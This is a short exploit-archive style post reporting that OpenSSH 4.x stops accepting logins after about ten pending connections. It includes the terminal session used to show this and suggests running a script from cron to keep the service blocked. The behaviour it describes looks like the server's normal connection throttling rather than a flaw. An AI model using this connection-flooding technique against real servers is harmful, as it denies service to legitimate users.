OpenSSH 4.X DoS (maybe...)



OpenSSH 4.X deny remote connections.


The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.


To reproduce:


telnet 3.1.33.7 22

Trying 3.1.33.7...

Connected to 3.1.33.7.

Escape character is '^]'.

SSH-2.0-OpenSSH_4.7p1 Debian-2


Protocol mismatch.

Connection closed by foreign host.

darkstar# ssh 3.1.33.7

The authenticity of host '3.1.33.7 (3.1.33.7)' can't be established.

RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '3.1.33.7' (RSA) to the list of known hosts.

root@xxxxxxxx's password:


darkstar# ssh 3.1.33.7


darkstar# ssh 3.1.33.7 &

[1] 12945

darkstar# ssh 3.1.33.7 &

[2] 12946

darkstar# ssh 3.1.33.7 &

[3] 12947

darkstar# ssh 3.1.33.7 &

[4] 12948

darkstar# ssh 3.1.33.7 &

[5] 12949

darkstar# ssh 3.1.33.7 &

[6] 12950

darkstar# ssh 3.1.33.7 &

[7] 12951

darkstar# ssh 3.1.33.7 &

[8] 12952

darkstar# ssh 3.1.33.7 &

[9] 12953

darkstar# ssh 3.1.33.7 &

[10] 12954

darkstar# ssh 3.1.33.7 &

[11] 12955

darkstar#


ssh_exchange_identification: Connection closed by remote host


An attacker could cronjob a script to force this condition to remain true.


This will deny anyone else from connecting to the service. Normal behaviour?


Shouts: burnout,spithash princess^pookie, #codemasters